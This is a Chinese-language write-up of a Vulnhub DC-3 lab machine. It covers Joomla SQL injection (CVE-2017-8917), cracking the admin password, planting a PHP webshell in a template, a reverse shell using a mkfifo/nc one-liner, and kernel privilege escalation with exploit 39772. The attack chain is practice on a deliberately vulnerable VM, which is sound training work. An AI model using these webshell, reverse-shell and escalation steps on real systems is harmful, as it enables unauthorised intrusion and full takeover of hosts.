Vulnhnb刷题-DC-3

Vulnhnb刷题-DC-3

打开后

信息收集

通过goby查到后台框架有一个漏洞，那就直接利用进入后台

利用过程

vulhub/joomla/CVE-2017-8917 at master · vulhub/vulhub · GitHub

或者使用kali自带的搜索相关exp

直接给出sqlmap的利用的命令，复制干就完了（记得改目标IP地址）

sqlmap 查库 把管理员用户名密码拿出来

看到user表，看看有什么东西

直接复制密码去使用kali带的解密工具爆破看看

管理地址：http://192.168.119.150/administrator

管理员用户名：admin

管理员密码：snoopy

传马

登录后台后在【Extensions】->【Templates】中任意模板中发现可以编辑和新建文件，那就直接新建一个一句话木马

但是还得了解一下 joomla的目录结构要不然访问不了木马

后面应该就是接模板名称

最后得到木马地址：http://192.168.119.150/templates/beez3/ma.php

直接上蚁剑连上

反弹一个shell给kali好操作（也可以不用）

kali监听8888端口

在蚁剑执行

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.150 8888 >/tmp/f

修改交互

python3 -c 'import pty;pty.spawn("/bin/bash")'

即可反弹shell到kali

提权

尝试内核提权

查询到系统为Ubuntu 16.4的版本 内核为Linux 4.4.0

查询可用的提权漏洞

经过尝试39772的这个可用，利用过程 导出查看exp

exp下载 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

把它复制到靶机上 直接使用python3的http.server服务，靶机使用wget即可

//解压文件夹
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
//依次执行
./compile.sh
./doubleput

等待一会即可提权成功

拿下！